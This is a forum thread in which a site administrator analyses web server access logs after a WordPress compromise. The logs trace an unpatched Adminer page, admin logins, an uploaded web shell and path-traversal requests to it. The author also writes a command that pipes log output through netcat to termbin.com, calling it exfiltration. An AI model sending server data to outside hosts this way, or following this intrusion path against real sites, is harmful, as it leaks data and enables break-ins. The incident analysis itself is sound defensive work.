access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /admin



I am tracing this attack back to Cloudflare, but this is not Cloudflare's fault, this is my own damn fault for not enabling the Cloudflare module to have the attacker's real fuqqqking IP logged. I know they're around/from Germany/Netherlands/Europe region though since their location of the CDN is that direction.



So I am going to grep for "172.69" and "162.158"



...

zgrep -a "10/Dec/2019:17:0" *gz | grep "172.69"

and

zgrep -a "10/Dec/2019:17:0" *gz | grep "162.158"



I am obviously going to add | nc termbin.com 9999

To exfil these logs.



Code:
access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:30 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:33 -0500] "GET /adminer-4.2.5.php?server=localhost&username=root&&sql= HTTP/1.1" 200 2541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:35 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:36 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:40 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:40 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:43 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:43 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.25 - - [10/Dec/2019:17:07:43 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:44 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:47 -0500] "POST /wp-login.php HTTP/1.1" 200 2556 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:48 -0500] "GET /wp-admin/profile.php HTTP/1.1" 200 12877 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:49 -0500] "GET / HTTP/1.1" 206 6147 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:07:56 -0500] "GET /wp-admin/theme-install.php?browse=featured HTTP/1.1" 200 13107 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:07:57 -0500] "POST /wp-admin/update.php?action=upload-theme HTTP/1.1" 200 9137 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 369 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:07:58 -0500] "GET /wp-admin/plugin-install.php HTTP/1.1" 200 15335 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:03 -0500] "GET /wp-admin/customize.php HTTP/1.1" 200 50368 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.109 - - [10/Dec/2019:17:08:05 -0500] "GET /wp-admin/options-general.php HTTP/1.1" 200 18686 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:07 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3010 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.73 - - [10/Dec/2019:17:08:08 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3061 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:172.69.10.115 - - [10/Dec/2019:17:08:09 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3074 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"



Code:
access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:29 -0500] "GET /adminer-4.2.5.php HTTP/1.1" 200 2300 "-" "Go-http-client/1.1"

access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:07:32 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 302 448 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:38 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2591 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.94.53 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:07:39 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2654 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:07:39 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.91.230 - - [10/Dec/2019:17:07:41 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2728 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:42 -0500] "POST /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 3320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:46 -0500] "GET /wp-login.php HTTP/1.1" 200 1795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.193 - - [10/Dec/2019:17:07:51 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.89.172 - - [10/Dec/2019:17:07:52 -0500] "GET /wp-admin/theme-editor.php?file=header.php&theme=photographer-wp HTTP/1.1" 200 13144 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.90.171 - - [10/Dec/2019:17:07:53 -0500] "GET /wp-admin/theme-editor.php?file=footer.php&theme=photographer-wp HTTP/1.1" 200 12475 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:07:54 -0500] "GET /wp-admin/theme-editor.php?file=functions.php&theme=photographer-wp HTTP/1.1" 200 36617 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:07:55 -0500] "POST / HTTP/1.1" 206 6145 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.88.197 - - [10/Dec/2019:17:08:00 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 403 2021 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.91.124 - - [10/Dec/2019:17:08:01 -0500] "POST /wp-content/plugins/supersociall/supersociall.php HTTP/1.1" 404 4632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.109 - - [10/Dec/2019:17:08:02 -0500] "POST /wp-admin/options.php HTTP/1.1" 403 2039 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.88.95 - - [10/Dec/2019:17:08:03 -0500] "POST /wp-login.php HTTP/1.1" 200 2557 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.92.105 - - [10/Dec/2019:17:08:06 -0500] "POST /wp-admin/options.php HTTP/1.1" 302 489 "http://CUSTOMERCOMPANY.com/wp-admin/options-general.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.94.77 - - [10/Dec/2019:17:08:07 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2806 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.90.21 - - [10/Dec/2019:17:08:08 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2841 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.8.gz:162.158.89.190 - - [10/Dec/2019:17:08:09 -0500] "GET /adminer-4.2.5.php?username=root&&server=localhost&sql= HTTP/1.1" 200 2871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

What does this shit mean? I traced this all the way back to an Adminer exploit. Someone left an unpatched Adminer on the system *cough cough, not me.. totally was me*. Ah well, we all fk up sometimes. :)

Evidence not to leave tools floating around public-facing.. dddaaaayummmiittttt h00000m0000000z stoooop hacccckking me lol :)
 

Attachments

  • 1581103028329.png
    1581103028329.png
    10.2 KB · Views: 4
  • 1581105928682.png
    1581105928682.png
    30.5 KB · Views: 4

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Just fetching more logs because I can:

Code:
zgrep -a "wp-simple-plugin.php" *gz



results:

Code:
access.log.2.gz:141.101.77.191 - - [22/Jan/2020:12:51:26 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.54.168 - - [22/Jan/2020:14:16:41 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.13 - - [22/Jan/2020:14:16:41 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.103 - - [22/Jan/2020:14:18:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.76.97 - - [22/Jan/2020:14:20:02 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.11 - - [23/Jan/2020:08:22:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.221 - - [23/Jan/2020:08:22:57 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.54.168 - - [23/Jan/2020:08:23:28 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 861 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.76.97 - - [23/Jan/2020:08:23:30 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 206 541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:162.158.111.28 - - [23/Jan/2020:08:23:32 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.54.168 - - [23/Jan/2020:08:24:02 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 3518 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.76.97 - - [24/Jan/2020:11:53:47 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.79 - - [24/Jan/2020:11:53:48 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.53 - - [24/Jan/2020:11:54:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 861 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.103 - - [24/Jan/2020:11:54:19 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 206 541 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:141.101.77.191 - - [24/Jan/2020:11:54:20 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.2.gz:172.69.55.163 - - [24/Jan/2020:11:54:50 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 206 3518 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.43 - - [15/Jan/2020:05:12:06 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.107 - - [15/Jan/2020:05:12:06 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.107 - - [15/Jan/2020:05:12:09 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:141.101.107.207 - - [15/Jan/2020:05:13:21 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:141.101.99.164 - - [15/Jan/2020:05:13:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.69 - - [15/Jan/2020:05:13:24 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.158.174 - - [15/Jan/2020:05:48:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.85 - - [15/Jan/2020:05:48:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.158.174 - - [15/Jan/2020:05:49:51 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.158.148 - - [16/Jan/2020:09:43:42 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.43 - - [16/Jan/2020:09:43:43 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.155.83 - - [16/Jan/2020:09:45:23 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:141.101.99.14 - - [17/Jan/2020:03:03:30 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.155.83 - - [17/Jan/2020:03:03:30 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.154.226 - - [17/Jan/2020:03:05:11 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.3.gz:162.158.159.37 - - [17/Jan/2020:03:06:51 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:141.101.77.155 - - [29/Dec/2019:18:58:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.172 - - [29/Dec/2019:18:58:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.89.190 - - [29/Dec/2019:18:58:10 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.21 - - [29/Dec/2019:18:58:40 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.94.53 - - [30/Dec/2019:19:18:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php HTTP/1.1" 206 356 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.90.171 - - [30/Dec/2019:19:18:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.193 - - [30/Dec/2019:19:18:35 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.184 - - [30/Dec/2019:19:19:05 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.92.109 - - [30/Dec/2019:19:19:35 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../../.. HTTP/1.1" 500 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

access.log.5.gz:162.158.91.56 - - [30/Dec/2019:19:20:35 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

